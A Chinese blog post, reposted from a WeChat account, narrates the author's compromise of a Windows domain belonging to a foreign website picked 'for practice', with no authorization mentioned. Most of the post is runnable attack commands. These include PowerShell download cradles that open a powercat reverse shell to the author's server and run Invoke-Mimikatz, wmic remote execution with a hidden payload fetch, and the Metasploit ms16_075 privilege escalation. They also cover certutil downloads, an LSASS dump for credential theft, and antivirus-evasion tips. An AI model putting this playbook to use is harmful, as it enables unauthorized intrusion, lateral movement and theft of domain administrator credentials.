我的一次内网域渗透实战

admin 2022年3月23日06:59:54评论111 views字数 2906阅读9分41秒阅读模式


我的一次内网域渗透实战

一、前言
我是一名热爱渗透测试的技术,前段时间想找个国外网站练手,正好碰到个域环境,我就把我的渗透思路记录下来了,分享给大家,有错误的地方大佬们请指出来,毕竟我太菜了,希望大佬不要喷我我的一次内网域渗透实战我的一次内网域渗透实战我的一次内网域渗透实战我的一次内网域渗透实战

二、CobaltStrike反弹shell
通过CNVD-C-2019-48814获取到shell,由于这个网站存在ETES杀毒软件,写入jsp木马或者利用vbs,certutil,powershell下载msf木马均会被杀,这里可以利用powershell反弹shell的形式在自己的vps上获取到一个shell。具体这个漏洞怎么利用我不说了,网上很多复现文章。
cobaltstrike生成一段powershell代码,插入payload


我的一次内网域渗透实战


执行payload就会在cs上获取到一个会话

我的一次内网域渗透实战


将cobaltstrike上的会话移到metasploit上(怎么移植,网上有很多教程)
在metasploit上接收到shell


我的一次内网域渗透实战


三、内网信息收集
查询域名称:net view /domain
查询域内计算机:net view /doamin:xx
查询域控制器时间:net time /domain
查询域管理用户:net group "domain admins" /domain
得到域控制主机名:net group "domain controllers" /domain
.....
获取域控主机名:net group "domain controllers" /domain


我的一次内网域渗透实战


通过ping主机名获取域控ip地址


我的一次内网域渗透实战


补丁情况:systeminfo


我的一次内网域渗透实战


MS14-068打了补丁,无奈只能上mimikatz读取密码,但是有eset杀毒软件,一上传就被杀了,有没有免杀的mimikatz,幸好powershell没被拦截,通过Invoke-Mimikatz读取密码。
本地nc监听本地35602端口:nc -lvvp 35602
在burpsuite上执行powercat反弹shell
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip地址 -p 端口 -e cmd


我的一次内网域渗透实战


Invoke-Mimikatz读取密码
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"


我的一次内网域渗透实战


成功读取到域控的管理员账号密码

四、拿下其他主机
有了域控账号密码,ip地址,就可以连接域控了,这里有很多种方法(ipc,wmic,p**ec,sc等等,这里我详细介绍3种方法)
1.IPC连接
net use \ip地址ipc$ 密码 /user:域控主机名域控管理名
将文件copy到其他服务器上:copy 1.bat \ip地址c$
获取服务器的时间:net time \ip地址
设置1.bat执行时间:at \ip地址 获取到的服务器时间 执行文件
删除ipc记录:net use \ipipc$ /del
2.wmic
wmic /node:ip地址 /user:用户名 /password:密码 process call create cmd.exe
3.p**e
p**ec \ip地址 -u 用户名  -p  密码  cmd
这里我通过wmic来连接,由于wmic没有回显


我的一次内网域渗透实战


可以执行powershell反弹到cobaltstrike上,在移植到msf上面
wmic /node:ip地址 /user:用户 /password:密码 process call create "cmd.exe /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('cs上生成的url'))""


我的一次内网域渗透实战


我的一次内网域渗透实战


在域控中进行下信息收集,获取域成员机器
查询所有域控制器:dsquery server
查询域内计算机:dsquery computer
查询域用户:dsquery user
查询域用户所在域组:net user 域账号 /domain
查询域组所包含的用户:net group 域组名 /domain
先获取域内计算机名


我的一次内网域渗透实战

通过PING获取域成员主机的ip地址,然后再用域管理wmic进行连接反弹shell,获取的ip如下(没包括域控和存在web漏洞的ip)


我的一次内网域渗透实战


cobaltstrike上线0.4和0.7的主机


我的一次内网域渗透实战


在对0.11主机进行连接时,ipc出现了错误代码86,指定的网络密码不正确。


我的一次内网域渗透实战


应该是域管理限制了这个域用户登录这台主机,要其他域用户可能会登录,由于要system权限才可以利用mimikatz抓取密码,所以这里需要提权

五、域控提权
systeninfo先查看下那些补丁
批量获取未打那些补丁
systeminfo>micropoor.txt&(for %i in ( KB3164038 KB3141780 ... ) do @Typemicropoor.txt|@find /i "%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt
获取到 KB3164038(ms16-075)补丁没有打,metasploit提供了个exp
use exploit/windows/local/ms16_075_reflection_juicy
set payload windows/meterpreter/reverse_tcp
set session 2
set lhost ip地址
set lport  端口
成功提到system权限,可以利用mimikatz读取密码了。


我的一次内网域渗透实战


由于域控上存在eset杀软,可以通过procdump+mimikatz读取密码
先下载procdump到域控上
certutil.exe -urlcache -split -f http://xxx.xxx.xxx.xxx/procdump64.exe


我的一次内网域渗透实战


执行:procdump64.exe -accepteula -ma lsass.exe lsass.dmp


我的一次内网域渗透实战


将lsass.dmp下载本地利用mimikatz读取出密码明文(两部操

作都需要管理员权限)
download C:/Windows/system32/lsass.dmp


我的一次内网域渗透实战


下载到本地之后,mimikatz执行mimikatz.exe "sekurlsa::minidump lsass.dmp""sekurlsa::logonPasswords full"  > 1.txt


我的一次内网域渗透实战


读取到5个用户明文,这里我只给一张图吧
最后登录0.11那个地址,由于cobaltstrike一直都不上线,我就采用的nc反弹


我的一次内网域渗透实战

我的一次内网域渗透实战


六、后记
渗透到这里,希望这个对刚入门内网渗透的朋友们有帮助,希望大佬们看了不要喷我我的一次内网域渗透实战我的一次内网域渗透实战我的一次内网域渗透实战


我的一次内网域渗透实战


本文始发于微信公众号(疯猫网络):我的一次内网域渗透实战

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月23日06:59:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   我的一次内网域渗透实战https://cn-sec.com/archives/509285.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息